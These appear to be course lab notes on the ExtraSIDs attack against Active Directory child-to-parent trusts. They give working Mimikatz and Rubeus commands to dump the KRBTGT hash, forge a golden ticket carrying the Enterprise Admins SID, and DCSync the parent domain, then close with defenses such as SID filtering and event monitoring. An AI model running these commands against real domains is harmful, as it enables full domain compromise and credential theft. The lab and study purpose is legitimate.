25.Attacking Domain Trusts - Child - Parent Trusts - from Windows

I. SID History Primer

Purpose:

• Used in Active Directory migrations to retain access to resources from the original domain after a user is migrated.

Mechanism:

• The original user's Security Identifier (SID) is stored in the sidHistory attribute of the new account in the target domain.

Abuse Potential:

• Attackers can inject privileged SIDs into the sidHistory attribute of a compromised account.

• This allows privilege escalation by impersonating high-privilege users or groups.

---

II. ExtraSIDs Attack - Mimikatz

Concept:

• Exploits the absence of SID filtering within an Active Directory forest to escalate privileges.

• Injects the SID of the Enterprise Admins group into a user's sidHistory attribute.

• Grants the attacker Enterprise Admin privileges within the parent domain.

Requirements:

• KRBTGT hash of the child domain.

• SID of the child domain.

• Name of a target user in the child domain (can be nonexistent).

• FQDN of the child domain.

• SID of the Enterprise Admins group in the parent domain.

Attack Steps:

1. Obtain KRBTGT hash:

   lsadump::dcsync /user:LOGISTICS\krbtgt

2. Retrieve Child Domain SID:

   Get-DomainSID

3. Retrieve Enterprise Admins SID:

   Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

   OR

   Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"

4. Execute ExtraSIDs Attack using Mimikatz:

   kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

5. Verify the Ticket:

   klist

6. Access Parent Domain Resources:

   dir \\academy-ea-dc01.inlanefreight.local\c$

---

III. ExtraSIDs Attack - Rubeus

Concept:

• An alternative method for executing the ExtraSIDs attack.

Attack Steps:

1. Gather Required Data (Same as Mimikatz).

2. Perform ExtraSIDs Attack using Rubeus:

   .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

3. Verify Ticket in Memory:

   klist

4. Perform DCSync Attack or Other Privileged Actions:

   lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCAL

---

IV. Security Considerations & Defense Strategies

• Enable SID Filtering:

  • Prevents SID injection across trusts.

  • Command:

    netdom trust TrustingDomain /domain:TrustedDomain /quarantine:yes

• Monitor for Unauthorized SID History Modifications:

  • Track changes in event logs (Event ID 4765 & 4766).

• Restrict Privileged Group Membership:

  • Minimize Enterprise Admins and Domain Admins group membership.

• Implement Tiered Administration Model:

  • Reduce exposure of high-privilege accounts to compromise.

• Regularly Audit Trust Relationships:

  • Identify and remediate unnecessary or insecure trusts.

By understanding and securing against SID History and ExtraSIDs abuse, organizations can reduce the risk of privilege escalation and domain compromise.